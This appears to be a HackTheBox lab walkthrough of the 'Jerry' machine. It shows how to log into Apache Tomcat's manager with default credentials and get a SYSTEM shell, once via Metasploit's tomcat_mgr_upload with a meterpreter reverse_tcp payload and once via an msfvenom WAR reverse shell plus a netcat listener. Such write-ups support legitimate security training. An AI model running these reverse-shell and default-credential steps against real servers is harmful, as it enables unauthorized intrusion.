Jerry HackTheBox WalkThrough
This is Jerry HackTheBox machine walkthrough and is also the
16th machine of our
OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to
Jerry HTB machine in
two different ways. One using
metasploit and other
without metasploit. Before starting let us know something about this machine. It is a
Windows box with IP address
10.10.10.95 and difficulty
easy assigned by its maker.
This machine is currently
retired so you will require
VIP subscription at
hackthebox.eu to access this machine. First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Jerry machine by pinging IP 10.10.10.95. If all goes correct then start hacking. As usual, I started by scanning the machine. Used
Nmap [a port scanner] for this task and the result is below-
$sudo nmap -sC -sV -oN Jerry.nmap 10.10.10.95
Nmap revealed only port
open. Let us perform
full port scan because there may be chances that some ports may be opened which is not listed in nmap’s top 1000 ports. Nmap full port scan gave the same number of open ports as it was given by default port scan. So, we have only port 8080 open and
Apache tomcat is running over it. The
7.0.88 which appears to be a lot vulnerable as compared to current version
9. Also tomcat web server has many number of vulnerabilities if you see its
changelog on its website.
Soon I get Information about any software and its version then my next step is to check for possible
vulnerabilities and their
exploits this version is affected with. After googling
Apache tomcat 7.0.88 exploit found that it is vulnerable to
Authenticated Upload Code Execution and the best part of it is that it has also a
metasploit module present by the name
exploit/multi/http/tomcat_mgr_upload. For more information check this GitHub post on rapid7 repository.
As it is an authenticated File Upload vulnerability so we will require a
valid credential to exploit this vulnerability. But till now we don’t know any valid credential of this website which is running over URL http://10.10.10.95:8080. This URL has a
default tomcat webserver installation page. So there may be chances that the
application manager credential of this webserver will be
default. The application manager page can be accessed at http://10.10.10.95:8080/manager/html. When I tried to login with the default credential
s3cret I could easily logged in. So here out credential is
When I tried to exploit this vulnerability using
exploit/multi/http/tomcat_mgr_upload module I could easily get shell. Let us get user shell using metasploit.
Getting User Shell With Metasploit – Method 1
msf6 > search tomcat_mgr
msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 exploit(multi/http/tomcat_mgr_upload) > set PAYLOAD java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.10.14.3
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 10.10.10.95
msf6 exploit(multi/http/tomcat_mgr_upload) > set HTTPUSERNAME tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HTTPPASSWORD s3cret
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
meterpreter > sysinfo
We have got user shell. Let us
upgrade it to fully qualified
windows CMD shell so that we can run more advanced windows command through it.
meterpreter > shell
So we have a fully qualified windows CMD shell. When I tried to check the current username through which we are logged in in this machine, it is
NT authority\system. This
NT Authority user has highest privilege in windows OS even higher than the
administrator user. We can now say we have full access over Jerry machine and hence we don’t require any
privilege escalation over it. Now, we can capture user and root flag from their respective directories.
Let us exploit this machine without metasploit because we should also have some alternative approach if it is already available.
Getting User Shell Without Metasploit – Method 2
To exploit this vulnerability without metasploit follow the given steps. The exploitation steps are similar to
Tabby HTB machine which I have already walked through. Check it here. In
tabby machine I have exploited this vulnerability using tomcat
CLI web application access feature, for more info check this documentation from
tomcat. In this walkthrough I will exploit this vulnerability via
Graphical User Interface panel of tomcat server.
So to exploit this vulnerability follow the given steps.
1. Create a war extension reverse shell using
2. Login into tomcat manager panel using credential
s3cret through URL http://10.10.10.95:8080/manager/html and deploy the shell.
3. List the deployed shell using the URL http://10.10.10.95:8080/manager/text/list.
4. Start netcat listener on your Kali machine to receive the reverse connection from the deployed shell.
5. Open the URL http://10.10.10.95:8080/shell/ to execute the shell. That’s all you will found reverse connection on your netcat listener.
Create Reverse Shell
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.197 LPORT=1234 -f war > shell.war
Deploy the Reverse Shell
Login to http://10.10.10.95:8080/manager/html using the credential
s3cret & deploy the shell.
List Deployed Shell
Open http://10.10.10.95:8080/manager/text/list in web browser to list all the deployed shell.
Start Netcat Listener
$nc -nvlp 1234
Execute the Deployed Shell
Open http://10.10.10.95:8080/shell/ in web browser to execute the deployed shell and get connection on your netcat listener.
We have got user shell and that too with NT Authority\system privilege. Let us capture user and root flags.
Capture User & Root Flag
$ type C:\Users\Administrator\Desktop\flags\"2 for the price of 1.txt"
This was how I rooted to Jerry HackTheBox machine with and without metasploit. Hope you have got something to learn from this box walkthrough and my methodology. Thanks for reading this. For any query and suggestion feel free to ping us at [email protected].